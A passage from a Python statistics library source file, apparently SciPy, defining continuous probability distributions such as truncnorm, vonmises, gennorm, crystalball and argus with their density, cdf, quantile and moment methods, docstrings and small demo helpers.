multivariate skew-normal distribution. J. Roy. Statist. Soc., B 61, 579-602.
http://azzalini.stat.unipd.it/SN/faq-r.html
"""
def _argcheck(self, a):
return np.isfinite(a)
def _pdf(self, x, a):
return 2.*_norm_pdf(x)*_norm_cdf(a*x)
def _cdf_single(self, x, *args):
_a, _b = self._get_support(*args)
if x <= 0:
cdf = integrate.quad(self._pdf, _a, x, args=args)[0]
else:
t1 = integrate.quad(self._pdf, _a, 0, args=args)[0]
t2 = integrate.quad(self._pdf, 0, x, args=args)[0]
cdf = t1 + t2
if cdf > 1:
# Presumably numerical noise, e.g. 1.0000000000000002
cdf = 1.0
return cdf
def _sf(self, x, a):
return self._cdf(-x, -a)
def _rvs(self, a):
u0 = self._random_state.normal(size=self._size)
v = self._random_state.normal(size=self._size)
d = a/np.sqrt(1 + a**2)
u1 = d*u0 + v*np.sqrt(1 - d**2)
return np.where(u0 >= 0, u1, -u1)
def _stats(self, a, moments='mvsk'):
output = [None, None, None, None]
const = np.sqrt(2/np.pi) * a/np.sqrt(1 + a**2)
if 'm' in moments:
output[0] = const
if 'v' in moments:
output[1] = 1 - const**2
if 's' in moments:
output[2] = ((4 - np.pi)/2) * (const/np.sqrt(1 - const**2))**3
if 'k' in moments:
output[3] = (2*(np.pi - 3)) * (const**4/(1 - const**2)**2)
return output
skewnorm = skew_norm_gen(name='skewnorm')
class trapz_gen(rv_continuous):
r"""A trapezoidal continuous random variable.
%(before_notes)s
Notes
-----
The trapezoidal distribution can be represented with an up-sloping line
from ``loc`` to ``(loc + c*scale)``, then constant to ``(loc + d*scale)``
and then downsloping from ``(loc + d*scale)`` to ``(loc+scale)``.
`trapz` takes :math:`c` and :math:`d` as shape parameters.
%(after_notes)s
    The standard form is in the range [0, 1], with ``c`` and ``d`` marking
    the start and end of the constant (modal) region.
The location parameter shifts the start to `loc`.
The scale parameter changes the width from 1 to `scale`.
%(example)s
"""
def _argcheck(self, c, d):
return (c >= 0) & (c <= 1) & (d >= 0) & (d <= 1) & (d >= c)
def _pdf(self, x, c, d):
u = 2 / (d-c+1)
return _lazyselect([x < c,
(c <= x) & (x <= d),
x > d],
[lambda x, c, d, u: u * x / c,
lambda x, c, d, u: u,
lambda x, c, d, u: u * (1-x) / (1-d)],
(x, c, d, u))
def _cdf(self, x, c, d):
return _lazyselect([x < c,
(c <= x) & (x <= d),
x > d],
[lambda x, c, d: x**2 / c / (d-c+1),
lambda x, c, d: (c + 2 * (x-c)) / (d-c+1),
lambda x, c, d: 1-((1-x) ** 2
/ (d-c+1) / (1-d))],
(x, c, d))
def _ppf(self, q, c, d):
qc, qd = self._cdf(c, c, d), self._cdf(d, c, d)
condlist = [q < qc, q <= qd, q > qd]
choicelist = [np.sqrt(q * c * (1 + d - c)),
0.5 * q * (1 + d - c) + 0.5 * c,
1 - np.sqrt((1 - q) * (d - c + 1) * (1 - d))]
return np.select(condlist, choicelist)
trapz = trapz_gen(a=0.0, b=1.0, name="trapz")
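# The piecewise pdf above integrates to one for any valid (c, d). A small
# numerical sketch of that normalization (illustrative values; assumes
# scipy is available):
def _trapz_area_demo(c=0.2, d=0.7):
    from scipy import integrate
    from scipy.stats import trapz
    # up-slope on [0, c], flat on [c, d], down-slope on [d, 1]
    area, _ = integrate.quad(trapz.pdf, 0, 1, args=(c, d))
    return area  # ~1.0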
class triang_gen(rv_continuous):
r"""A triangular continuous random variable.
%(before_notes)s
Notes
-----
The triangular distribution can be represented with an up-sloping line from
``loc`` to ``(loc + c*scale)`` and then downsloping for ``(loc + c*scale)``
to ``(loc + scale)``.
`triang` takes ``c`` as a shape parameter for :math:`c`.
%(after_notes)s
The standard form is in the range [0, 1] with c the mode.
The location parameter shifts the start to `loc`.
The scale parameter changes the width from 1 to `scale`.
%(example)s
"""
def _rvs(self, c):
return self._random_state.triangular(0, c, 1, self._size)
def _argcheck(self, c):
return (c >= 0) & (c <= 1)
def _pdf(self, x, c):
# 0: edge case where c=0
# 1: generalised case for x < c, don't use x <= c, as it doesn't cope
# with c = 0.
# 2: generalised case for x >= c, but doesn't cope with c = 1
# 3: edge case where c=1
r = _lazyselect([c == 0,
x < c,
(x >= c) & (c != 1),
c == 1],
[lambda x, c: 2 - 2 * x,
lambda x, c: 2 * x / c,
lambda x, c: 2 * (1 - x) / (1 - c),
lambda x, c: 2 * x],
(x, c))
return r
def _cdf(self, x, c):
r = _lazyselect([c == 0,
x < c,
(x >= c) & (c != 1),
c == 1],
[lambda x, c: 2*x - x*x,
lambda x, c: x * x / c,
lambda x, c: (x*x - 2*x + c) / (c-1),
lambda x, c: x * x],
(x, c))
return r
def _ppf(self, q, c):
return np.where(q < c, np.sqrt(c * q), 1-np.sqrt((1-c) * (1-q)))
def _stats(self, c):
return ((c+1.0)/3.0,
(1.0-c+c*c)/18,
np.sqrt(2)*(2*c-1)*(c+1)*(c-2) / (5*np.power((1.0-c+c*c), 1.5)),
-3.0/5.0)
def _entropy(self, c):
return 0.5-np.log(2)
triang = triang_gen(a=0.0, b=1.0, name="triang")
class truncexpon_gen(rv_continuous):
r"""A truncated exponential continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `truncexpon` is:
.. math::
f(x, b) = \frac{\exp(-x)}{1 - \exp(-b)}
for :math:`0 <= x <= b`.
`truncexpon` takes ``b`` as a shape parameter for :math:`b`.
%(after_notes)s
%(example)s
"""
def _argcheck(self, b):
return b > 0
def _get_support(self, b):
return self.a, b
def _pdf(self, x, b):
# truncexpon.pdf(x, b) = exp(-x) / (1-exp(-b))
return np.exp(-x)/(-sc.expm1(-b))
def _logpdf(self, x, b):
return -x - np.log(-sc.expm1(-b))
def _cdf(self, x, b):
return sc.expm1(-x)/sc.expm1(-b)
def _ppf(self, q, b):
return -sc.log1p(q*sc.expm1(-b))
def _munp(self, n, b):
# wrong answer with formula, same as in continuous.pdf
        # return sc.gamma(n+1) - sc.gammainc(1+n, b)
if n == 1:
return (1-(b+1)*np.exp(-b))/(-sc.expm1(-b))
elif n == 2:
return 2*(1-0.5*(b*b+2*b+2)*np.exp(-b))/(-sc.expm1(-b))
else:
# return generic for higher moments
# return rv_continuous._mom1_sc(self, n, b)
return self._mom1_sc(n, b)
def _entropy(self, b):
eB = np.exp(b)
return np.log(eB-1)+(1+eB*(b-1.0))/(1.0-eB)
truncexpon = truncexpon_gen(a=0.0, name='truncexpon')
class truncnorm_gen(rv_continuous):
r"""A truncated normal continuous random variable.
%(before_notes)s
Notes
-----
The standard form of this distribution is a standard normal truncated to
the range [a, b] --- notice that a and b are defined over the domain of the
standard normal. To convert clip values for a specific mean and standard
deviation, use::
a, b = (myclip_a - my_mean) / my_std, (myclip_b - my_mean) / my_std
`truncnorm` takes :math:`a` and :math:`b` as shape parameters.
%(after_notes)s
%(example)s
"""
def _argcheck(self, a, b):
return a < b
def _get_support(self, a, b):
return a, b
def _get_norms(self, a, b):
_nb = _norm_cdf(b)
_na = _norm_cdf(a)
_sb = _norm_sf(b)
_sa = _norm_sf(a)
_delta = np.where(a > 0, _sa - _sb, _nb - _na)
with np.errstate(divide='ignore'):
return _na, _nb, _sa, _sb, _delta, np.log(_delta)
def _pdf(self, x, a, b):
ans = self._get_norms(a, b)
_delta = ans[4]
return _norm_pdf(x) / _delta
def _logpdf(self, x, a, b):
ans = self._get_norms(a, b)
_logdelta = ans[5]
return _norm_logpdf(x) - _logdelta
def _cdf(self, x, a, b):
ans = self._get_norms(a, b)
_na, _delta = ans[0], ans[4]
return (_norm_cdf(x) - _na) / _delta
def _ppf(self, q, a, b):
# XXX Use _lazywhere...
ans = self._get_norms(a, b)
_na, _nb, _sa, _sb = ans[:4]
ppf = np.where(a > 0,
_norm_isf(q*_sb + _sa*(1.0-q)),
_norm_ppf(q*_nb + _na*(1.0-q)))
return ppf
def _stats(self, a, b):
ans = self._get_norms(a, b)
nA, nB = ans[:2]
d = nB - nA
pA, pB = _norm_pdf(a), _norm_pdf(b)
mu = (pA - pB) / d # correction sign
mu2 = 1 + (a*pA - b*pB) / d - mu*mu
return mu, mu2, None, None
truncnorm = truncnorm_gen(name='truncnorm')
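# The clip-value conversion in the docstring is easy to get wrong, so here
# is a minimal sketch (illustrative numbers) of truncating N(5, 2) to the
# interval [1, 9]:
def _truncnorm_clip_demo():
    from scipy.stats import truncnorm
    my_mean, my_std = 5.0, 2.0
    myclip_a, myclip_b = 1.0, 9.0
    a, b = (myclip_a - my_mean) / my_std, (myclip_b - my_mean) / my_std
    dist = truncnorm(a, b, loc=my_mean, scale=my_std)
    # the ppf at 0 and 1 recovers the original clip values
    return dist.ppf([0.0, 1.0])  # array([1., 9.])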
# FIXME: RVS does not work.
class tukeylambda_gen(rv_continuous):
r"""A Tukey-Lamdba continuous random variable.
%(before_notes)s
Notes
-----
A flexible distribution, able to represent and interpolate between the
following distributions:
    - Cauchy (:math:`\lambda = -1`)
    - logistic (:math:`\lambda = 0`)
    - approx Normal (:math:`\lambda = 0.14`)
    - uniform from -1 to 1 (:math:`\lambda = 1`)
    `tukeylambda` takes a real number :math:`\lambda` (denoted ``lam``
    in the implementation) as a shape parameter.
%(after_notes)s
%(example)s
"""
def _argcheck(self, lam):
return np.ones(np.shape(lam), dtype=bool)
def _pdf(self, x, lam):
Fx = np.asarray(sc.tklmbda(x, lam))
Px = Fx**(lam-1.0) + (np.asarray(1-Fx))**(lam-1.0)
Px = 1.0/np.asarray(Px)
return np.where((lam <= 0) | (abs(x) < 1.0/np.asarray(lam)), Px, 0.0)
def _cdf(self, x, lam):
return sc.tklmbda(x, lam)
def _ppf(self, q, lam):
return sc.boxcox(q, lam) - sc.boxcox1p(-q, lam)
def _stats(self, lam):
return 0, _tlvar(lam), 0, _tlkurt(lam)
def _entropy(self, lam):
def integ(p):
return np.log(pow(p, lam-1)+pow(1-p, lam-1))
return integrate.quad(integ, 0, 1)[0]
tukeylambda = tukeylambda_gen(name='tukeylambda')
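# The interpolation property above can be spot-checked: at lam = 0 the
# Tukey-lambda cdf coincides with the standard logistic cdf. A minimal
# sketch (illustrative value; assumes scipy.stats is importable):
def _tukeylambda_logistic_demo(x=1.3):
    import numpy as np
    from scipy.stats import logistic, tukeylambda
    return np.isclose(tukeylambda.cdf(x, 0.0), logistic.cdf(x))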
class FitUniformFixedScaleDataError(FitDataError):
def __init__(self, ptp, fscale):
self.args = (
"Invalid values in `data`. Maximum likelihood estimation with "
"the uniform distribution and fixed scale requires that "
"data.ptp() <= fscale, but data.ptp() = %r and fscale = %r." %
(ptp, fscale),
)
class uniform_gen(rv_continuous):
r"""A uniform continuous random variable.
In the standard form, the distribution is uniform on ``[0, 1]``. Using
the parameters ``loc`` and ``scale``, one obtains the uniform distribution
on ``[loc, loc + scale]``.
%(before_notes)s
%(example)s
"""
def _rvs(self):
return self._random_state.uniform(0.0, 1.0, self._size)
def _pdf(self, x):
        return 1.0*(x == x)  # an array of ones matching x (0.0 for NaN input)
def _cdf(self, x):
return x
def _ppf(self, q):
return q
def _stats(self):
return 0.5, 1.0/12, 0, -1.2
def _entropy(self):
return 0.0
def fit(self, data, *args, **kwds):
"""
Maximum likelihood estimate for the location and scale parameters.
`uniform.fit` uses only the following parameters. Because exact
formulas are used, the parameters related to optimization that are
available in the `fit` method of other distributions are ignored
here. The only positional argument accepted is `data`.
Parameters
----------
data : array_like
Data to use in calculating the maximum likelihood estimate.
floc : float, optional
Hold the location parameter fixed to the specified value.
fscale : float, optional
Hold the scale parameter fixed to the specified value.
Returns
-------
loc, scale : float
Maximum likelihood estimates for the location and scale.
Notes
-----
An error is raised if `floc` is given and any values in `data` are
less than `floc`, or if `fscale` is given and `fscale` is less
than ``data.max() - data.min()``. An error is also raised if both
`floc` and `fscale` are given.
Examples
--------
>>> from scipy.stats import uniform
We'll fit the uniform distribution to `x`:
>>> x = np.array([2, 2.5, 3.1, 9.5, 13.0])
For a uniform distribution MLE, the location is the minimum of the
data, and the scale is the maximum minus the minimum.
>>> loc, scale = uniform.fit(x)
>>> loc
2.0
>>> scale
11.0
If we know the data comes from a uniform distribution where the support
starts at 0, we can use `floc=0`:
>>> loc, scale = uniform.fit(x, floc=0)
>>> loc
0.0
>>> scale
13.0
Alternatively, if we know the length of the support is 12, we can use
`fscale=12`:
>>> loc, scale = uniform.fit(x, fscale=12)
>>> loc
1.5
>>> scale
12.0
In that last example, the support interval is [1.5, 13.5]. This
solution is not unique. For example, the distribution with ``loc=2``
and ``scale=12`` has the same likelihood as the one above. When
`fscale` is given and it is larger than ``data.max() - data.min()``,
the parameters returned by the `fit` method center the support over
the interval ``[data.min(), data.max()]``.
"""
if len(args) > 0:
raise TypeError("Too many arguments.")
floc = kwds.pop('floc', None)
fscale = kwds.pop('fscale', None)
_remove_optimizer_parameters(kwds)
if floc is not None and fscale is not None:
# This check is for consistency with `rv_continuous.fit`.
raise ValueError("All parameters fixed. There is nothing to "
"optimize.")
data = np.asarray(data)
# MLE for the uniform distribution
# --------------------------------
# The PDF is
#
# f(x, loc, scale) = {1/scale for loc <= x <= loc + scale
# {0 otherwise}
#
# The likelihood function is
# L(x, loc, scale) = (1/scale)**n
# where n is len(x), assuming loc <= x <= loc + scale for all x.
# The log-likelihood is
# l(x, loc, scale) = -n*log(scale)
# The log-likelihood is maximized by making scale as small as possible,
# while keeping loc <= x <= loc + scale. So if neither loc nor scale
# are fixed, the log-likelihood is maximized by choosing
# loc = x.min()
# scale = x.ptp()
# If loc is fixed, it must be less than or equal to x.min(), and then
# the scale is
# scale = x.max() - loc
# If scale is fixed, it must not be less than x.ptp(). If scale is
# greater than x.ptp(), the solution is not unique. Note that the
# likelihood does not depend on loc, except for the requirement that
# loc <= x <= loc + scale. All choices of loc for which
# x.max() - scale <= loc <= x.min()
# have the same log-likelihood. In this case, we choose loc such that
# the support is centered over the interval [data.min(), data.max()]:
        #     loc = x.min() - 0.5*(scale - x.ptp())
if fscale is None:
# scale is not fixed.
if floc is None:
# loc is not fixed, scale is not fixed.
loc = data.min()
scale = data.ptp()
else:
# loc is fixed, scale is not fixed.
loc = floc
scale = data.max() - loc
if data.min() < loc:
raise FitDataError("uniform", lower=loc, upper=loc + scale)
else:
# loc is not fixed, scale is fixed.
ptp = data.ptp()
if ptp > fscale:
raise FitUniformFixedScaleDataError(ptp=ptp, fscale=fscale)
# If ptp < fscale, the ML estimate is not unique; see the comments
# above. We choose the distribution for which the support is
# centered over the interval [data.min(), data.max()].
loc = data.min() - 0.5*(fscale - ptp)
scale = fscale
# We expect the return values to be floating point, so ensure it
# by explicitly converting to float.
return float(loc), float(scale)
uniform = uniform_gen(a=0.0, b=1.0, name='uniform')
class vonmises_gen(rv_continuous):
r"""A Von Mises continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `vonmises` and `vonmises_line` is:
.. math::
f(x, \kappa) = \frac{ \exp(\kappa \cos(x)) }{ 2 \pi I_0(\kappa) }
for :math:`-\pi \le x \le \pi`, :math:`\kappa > 0`. :math:`I_0` is the
modified Bessel function of order zero (`scipy.special.i0`).
`vonmises` is a circular distribution which does not restrict the
distribution to a fixed interval. Currently, there is no circular
distribution framework in scipy. The ``cdf`` is implemented such that
``cdf(x + 2*np.pi) == cdf(x) + 1``.
`vonmises_line` is the same distribution, defined on :math:`[-\pi, \pi]`
on the real line. This is a regular (i.e. non-circular) distribution.
`vonmises` and `vonmises_line` take ``kappa`` as a shape parameter.
%(after_notes)s
%(example)s
"""
def _rvs(self, kappa):
return self._random_state.vonmises(0.0, kappa, size=self._size)
def _pdf(self, x, kappa):
# vonmises.pdf(x, \kappa) = exp(\kappa * cos(x)) / (2*pi*I[0](\kappa))
return np.exp(kappa * np.cos(x)) / (2*np.pi*sc.i0(kappa))
def _cdf(self, x, kappa):
return _stats.von_mises_cdf(kappa, x)
def _stats_skip(self, kappa):
return 0, None, 0, None
def _entropy(self, kappa):
return (-kappa * sc.i1(kappa) / sc.i0(kappa) +
np.log(2 * np.pi * sc.i0(kappa)))
vonmises = vonmises_gen(name='vonmises')
vonmises_line = vonmises_gen(a=-np.pi, b=np.pi, name='vonmises_line')
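# The circular-cdf convention described in the docstring can be verified
# directly. A minimal sketch (illustrative values; assumes numpy and
# scipy.stats are importable):
def _vonmises_wrap_demo(x=0.7, kappa=2.0):
    import numpy as np
    from scipy.stats import vonmises
    # cdf(x + 2*pi) == cdf(x) + 1 for the circular distribution
    return np.isclose(vonmises.cdf(x + 2 * np.pi, kappa),
                      vonmises.cdf(x, kappa) + 1.0)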
class wald_gen(invgauss_gen):
r"""A Wald continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `wald` is:
.. math::
f(x) = \frac{1}{\sqrt{2\pi x^3}} \exp(- \frac{ (x-1)^2 }{ 2x })
for :math:`x >= 0`.
`wald` is a special case of `invgauss` with ``mu=1``.
%(after_notes)s
%(example)s
"""
_support_mask = rv_continuous._open_support_mask
def _rvs(self):
return self._random_state.wald(1.0, 1.0, size=self._size)
def _pdf(self, x):
# wald.pdf(x) = 1/sqrt(2*pi*x**3) * exp(-(x-1)**2/(2*x))
return invgauss._pdf(x, 1.0)
def _logpdf(self, x):
return invgauss._logpdf(x, 1.0)
def _cdf(self, x):
return invgauss._cdf(x, 1.0)
def _stats(self):
return 1.0, 1.0, 3.0, 15.0
wald = wald_gen(a=0.0, name="wald")
class wrapcauchy_gen(rv_continuous):
r"""A wrapped Cauchy continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `wrapcauchy` is:
.. math::
f(x, c) = \frac{1-c^2}{2\pi (1+c^2 - 2c \cos(x))}
for :math:`0 \le x \le 2\pi`, :math:`0 < c < 1`.
`wrapcauchy` takes ``c`` as a shape parameter for :math:`c`.
%(after_notes)s
%(example)s
"""
def _argcheck(self, c):
return (c > 0) & (c < 1)
def _pdf(self, x, c):
# wrapcauchy.pdf(x, c) = (1-c**2) / (2*pi*(1+c**2-2*c*cos(x)))
return (1.0-c*c)/(2*np.pi*(1+c*c-2*c*np.cos(x)))
def _cdf(self, x, c):
output = np.zeros(x.shape, dtype=x.dtype)
val = (1.0+c)/(1.0-c)
c1 = x < np.pi
c2 = 1-c1
xp = np.extract(c1, x)
xn = np.extract(c2, x)
if np.any(xn):
valn = np.extract(c2, np.ones_like(x)*val)
xn = 2*np.pi - xn
yn = np.tan(xn/2.0)
on = 1.0-1.0/np.pi*np.arctan(valn*yn)
np.place(output, c2, on)
if np.any(xp):
valp = np.extract(c1, np.ones_like(x)*val)
yp = np.tan(xp/2.0)
op = 1.0/np.pi*np.arctan(valp*yp)
np.place(output, c1, op)
return output
def _ppf(self, q, c):
val = (1.0-c)/(1.0+c)
rcq = 2*np.arctan(val*np.tan(np.pi*q))
rcmq = 2*np.pi-2*np.arctan(val*np.tan(np.pi*(1-q)))
return np.where(q < 1.0/2, rcq, rcmq)
def _entropy(self, c):
return np.log(2*np.pi*(1-c*c))
wrapcauchy = wrapcauchy_gen(a=0.0, b=2*np.pi, name='wrapcauchy')
class gennorm_gen(rv_continuous):
r"""A generalized normal continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `gennorm` is [1]_:
.. math::
f(x, \beta) = \frac{\beta}{2 \Gamma(1/\beta)} \exp(-|x|^\beta)
:math:`\Gamma` is the gamma function (`scipy.special.gamma`).
`gennorm` takes ``beta`` as a shape parameter for :math:`\beta`.
For :math:`\beta = 1`, it is identical to a Laplace distribution.
For :math:`\beta = 2`, it is identical to a normal distribution
(with ``scale=1/sqrt(2)``).
See Also
--------
laplace : Laplace distribution
norm : normal distribution
References
----------
.. [1] "Generalized normal distribution, Version 1",
https://en.wikipedia.org/wiki/Generalized_normal_distribution#Version_1
%(example)s
"""
def _pdf(self, x, beta):
return np.exp(self._logpdf(x, beta))
def _logpdf(self, x, beta):
return np.log(0.5*beta) - sc.gammaln(1.0/beta) - abs(x)**beta
def _cdf(self, x, beta):
c = 0.5 * np.sign(x)
# evaluating (.5 + c) first prevents numerical cancellation
return (0.5 + c) - c * sc.gammaincc(1.0/beta, abs(x)**beta)
def _ppf(self, x, beta):
c = np.sign(x - 0.5)
# evaluating (1. + c) first prevents numerical cancellation
return c * sc.gammainccinv(1.0/beta, (1.0 + c) - 2.0*c*x)**(1.0/beta)
def _sf(self, x, beta):
return self._cdf(-x, beta)
def _isf(self, x, beta):
return -self._ppf(x, beta)
def _stats(self, beta):
c1, c3, c5 = sc.gammaln([1.0/beta, 3.0/beta, 5.0/beta])
return 0., np.exp(c3 - c1), 0., np.exp(c5 + c1 - 2.0*c3) - 3.
def _entropy(self, beta):
return 1. / beta - np.log(.5 * beta) + sc.gammaln(1. / beta)
gennorm = gennorm_gen(name='gennorm')
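# The two special cases noted in the docstring make convenient sanity
# checks. A short sketch comparing densities (illustrative value; assumes
# numpy and scipy.stats are importable):
def _gennorm_special_cases_demo(x=0.4):
    import numpy as np
    from scipy.stats import gennorm, laplace, norm
    laplace_ok = np.isclose(gennorm.pdf(x, 1), laplace.pdf(x))
    normal_ok = np.isclose(gennorm.pdf(x, 2),
                           norm.pdf(x, scale=1 / np.sqrt(2)))
    return laplace_ok and normal_ok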
class halfgennorm_gen(rv_continuous):
r"""The upper half of a generalized normal continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `halfgennorm` is:
.. math::
f(x, \beta) = \frac{\beta}{\Gamma(1/\beta)} \exp(-|x|^\beta)
for :math:`x > 0`. :math:`\Gamma` is the gamma function
(`scipy.special.gamma`).
    `halfgennorm` takes ``beta`` as a shape parameter for :math:`\beta`.
For :math:`\beta = 1`, it is identical to an exponential distribution.
For :math:`\beta = 2`, it is identical to a half normal distribution
(with ``scale=1/sqrt(2)``).
See Also
--------
gennorm : generalized normal distribution
expon : exponential distribution
halfnorm : half normal distribution
References
----------
.. [1] "Generalized normal distribution, Version 1",
https://en.wikipedia.org/wiki/Generalized_normal_distribution#Version_1
%(example)s
"""
def _pdf(self, x, beta):
# beta
# halfgennorm.pdf(x, beta) = ------------- exp(-|x|**beta)
# gamma(1/beta)
return np.exp(self._logpdf(x, beta))
def _logpdf(self, x, beta):
return np.log(beta) - sc.gammaln(1.0/beta) - x**beta
def _cdf(self, x, beta):
return sc.gammainc(1.0/beta, x**beta)
def _ppf(self, x, beta):
return sc.gammaincinv(1.0/beta, x)**(1.0/beta)
def _sf(self, x, beta):
return sc.gammaincc(1.0/beta, x**beta)
def _isf(self, x, beta):
return sc.gammainccinv(1.0/beta, x)**(1.0/beta)
def _entropy(self, beta):
return 1.0/beta - np.log(beta) + sc.gammaln(1.0/beta)
halfgennorm = halfgennorm_gen(a=0, name='halfgennorm')
class crystalball_gen(rv_continuous):
r"""
Crystalball distribution
%(before_notes)s
Notes
-----
The probability density function for `crystalball` is:
.. math::
f(x, \beta, m) = \begin{cases}
N \exp(-x^2 / 2), &\text{for } x > -\beta\\
N A (B - x)^{-m} &\text{for } x \le -\beta
\end{cases}
    where :math:`A = (m / |\beta|)^m \exp(-\beta^2 / 2)`,
:math:`B = m/|\beta| - |\beta|` and :math:`N` is a normalisation constant.
`crystalball` takes :math:`\beta > 0` and :math:`m > 1` as shape
parameters. :math:`\beta` defines the point where the pdf changes
from a power-law to a Gaussian distribution. :math:`m` is the power
of the power-law tail.
References
----------
.. [1] "Crystal Ball Function",
https://en.wikipedia.org/wiki/Crystal_Ball_function
%(after_notes)s
.. versionadded:: 0.19.0
%(example)s
"""
def _pdf(self, x, beta, m):
"""
Return PDF of the crystalball function.
--
| exp(-x**2 / 2), for x > -beta
crystalball.pdf(x, beta, m) = N * |
| A * (B - x)**(-m), for x <= -beta
--
"""
N = 1.0 / (m/beta / (m-1) * np.exp(-beta**2 / 2.0) +
_norm_pdf_C * _norm_cdf(beta))
def rhs(x, beta, m):
return np.exp(-x**2 / 2)
def lhs(x, beta, m):
return ((m/beta)**m * np.exp(-beta**2 / 2.0) *
(m/beta - beta - x)**(-m))
return N * _lazywhere(x > -beta, (x, beta, m), f=rhs, f2=lhs)
def _logpdf(self, x, beta, m):
"""
Return the log of the PDF of the crystalball function.
"""
N = 1.0 / (m/beta / (m-1) * np.exp(-beta**2 / 2.0) +
_norm_pdf_C * _norm_cdf(beta))
def rhs(x, beta, m):
return -x**2/2
def lhs(x, beta, m):
return m*np.log(m/beta) - beta**2/2 - m*np.log(m/beta - beta - x)
return np.log(N) + _lazywhere(x > -beta, (x, beta, m), f=rhs, f2=lhs)
def _cdf(self, x, beta, m):
"""
Return CDF of the crystalball function
"""
N = 1.0 / (m/beta / (m-1) * np.exp(-beta**2 / 2.0) +
_norm_pdf_C * _norm_cdf(beta))
def rhs(x, beta, m):
return ((m/beta) * np.exp(-beta**2 / 2.0) / (m-1) +
_norm_pdf_C * (_norm_cdf(x) - _norm_cdf(-beta)))
def lhs(x, beta, m):
return ((m/beta)**m * np.exp(-beta**2 / 2.0) *
(m/beta - beta - x)**(-m+1) / (m-1))
return N * _lazywhere(x > -beta, (x, beta, m), f=rhs, f2=lhs)
def _ppf(self, p, beta, m):
N = 1.0 / (m/beta / (m-1) * np.exp(-beta**2 / 2.0) +
_norm_pdf_C * _norm_cdf(beta))
pbeta = N * (m/beta) * np.exp(-beta**2/2) / (m - 1)
def ppf_less(p, beta, m):
eb2 = np.exp(-beta**2/2)
C = (m/beta) * eb2 / (m-1)
N = 1/(C + _norm_pdf_C * _norm_cdf(beta))
return (m/beta - beta -
((m - 1)*(m/beta)**(-m)/eb2*p/N)**(1/(1-m)))
def ppf_greater(p, beta, m):
eb2 = np.exp(-beta**2/2)
C = (m/beta) * eb2 / (m-1)
N = 1/(C + _norm_pdf_C * _norm_cdf(beta))
return _norm_ppf(_norm_cdf(-beta) + (1/_norm_pdf_C)*(p/N - C))
return _lazywhere(p < pbeta, (p, beta, m), f=ppf_less, f2=ppf_greater)
def _munp(self, n, beta, m):
"""
Returns the n-th non-central moment of the crystalball function.
"""
N = 1.0 / (m/beta / (m-1) * np.exp(-beta**2 / 2.0) +
_norm_pdf_C * _norm_cdf(beta))
def n_th_moment(n, beta, m):
"""
            Returns the n-th moment. Defined only if n + 1 < m.
            The function cannot broadcast due to the loop over n.
"""
A = (m/beta)**m * np.exp(-beta**2 / 2.0)
B = m/beta - beta
rhs = (2**((n-1)/2.0) * sc.gamma((n+1)/2) *
(1.0 + (-1)**n * sc.gammainc((n+1)/2, beta**2 / 2)))
lhs = np.zeros(rhs.shape)
for k in range(n + 1):
lhs += (sc.binom(n, k) * B**(n-k) * (-1)**k / (m - k - 1) *
(m/beta)**(-m + k + 1))
return A * lhs + rhs
return N * _lazywhere(n + 1 < m, (n, beta, m),
                              np.vectorize(n_th_moment, otypes=[float]),
np.inf)
def _argcheck(self, beta, m):
"""
Shape parameter bounds are m > 1 and beta > 0.
"""
return (m > 1) & (beta > 0)
crystalball = crystalball_gen(name='crystalball', longname="A Crystalball Function")
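# The piecewise definition above is constructed so that the density stays
# continuous at the matching point x = -beta. A minimal numerical sketch
# (illustrative shape values; assumes scipy.stats is importable):
def _crystalball_continuity_demo(beta=1.5, m=3.0, eps=1e-8):
    from scipy.stats import crystalball
    left = crystalball.pdf(-beta - eps, beta, m)   # power-law side
    right = crystalball.pdf(-beta + eps, beta, m)  # Gaussian side
    return abs(left - right)  # ~0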
def _argus_phi(chi):
"""
Utility function for the argus distribution
    used in the CDF and normalization constant of the argus function
"""
return _norm_cdf(chi) - chi * _norm_pdf(chi) - 0.5
class argus_gen(rv_continuous):
r"""
Argus distribution
%(before_notes)s
Notes
-----
The probability density function for `argus` is:
.. math::
f(x, \chi) = \frac{\chi^3}{\sqrt{2\pi} \Psi(\chi)} x \sqrt{1-x^2}
\exp(-\chi^2 (1 - x^2)/2)
for :math:`0 < x < 1`, where
.. math::
\Psi(\chi) = \Phi(\chi) - \chi \phi(\chi) - 1/2
with :math:`\Phi` and :math:`\phi` being the CDF and PDF of a standard
normal distribution, respectively.
    `argus` takes :math:`\chi` as a shape parameter.
References
----------
.. [1] "ARGUS distribution",
https://en.wikipedia.org/wiki/ARGUS_distribution
%(after_notes)s
.. versionadded:: 0.19.0
%(example)s
"""
def _pdf(self, x, chi):
"""
Return PDF of the argus function
argus.pdf(x, chi) = chi**3 / (sqrt(2*pi) * Psi(chi)) * x *
sqrt(1-x**2) * exp(- 0.5 * chi**2 * (1 - x**2))
"""
y = 1.0 - x**2
return chi**3 / (_norm_pdf_C * _argus_phi(chi)) * x * np.sqrt(y) * np.exp(-chi**2 * y / 2)
def _cdf(self, x, chi):
"""
Return CDF of the argus function
"""
return 1.0 - self._sf(x, chi)
def _sf(self, x, chi):
"""
Return survival function of the argus function
"""
return _argus_phi(chi * np.sqrt(1 - x**2)) / _argus_phi(chi)
argus = argus_gen(name='argus', longname="An Argus Function", a=0.0, b=1.0)
class rv_histogram(rv_continuous):
"""
Generates a distribution given by a histogram.
This is useful to generate a template distribution from a binned
datasample.
As a subclass of the `rv_continuous` class, `rv_histogram` inherits from it
a collection of generic methods (see `rv_continuous` for the full list),
and implements them based on the properties of the provided binned
datasample.
Parameters
----------
histogram : tuple of array_like
Tuple containing two array_like objects
The first containing the content of n bins
The second containing the (n+1) bin boundaries
        In particular, the return value of np.histogram is accepted
Notes
-----
There are no additional shape parameters except for the loc and scale.
    The pdf is defined as a stepwise function from the provided histogram.
The cdf is a linear interpolation of the pdf.
.. versionadded:: 0.19.0
Examples
--------
Create a scipy.stats distribution from a numpy histogram
>>> import scipy.stats
>>> import numpy as np
>>> data = scipy.stats.norm.rvs(size=100000, loc=0, scale=1.5, random_state=123)
>>> hist = np.histogram(data, bins=100)
>>> hist_dist = scipy.stats.rv_histogram(hist)
Behaves like an ordinary scipy rv_continuous distribution
>>> hist_dist.pdf(1.0)
0.20538577847618705
>>> hist_dist.cdf(2.0)
0.90818568543056499
PDF is zero above (below) the highest (lowest) bin of the histogram,
defined by the max (min) of the original dataset
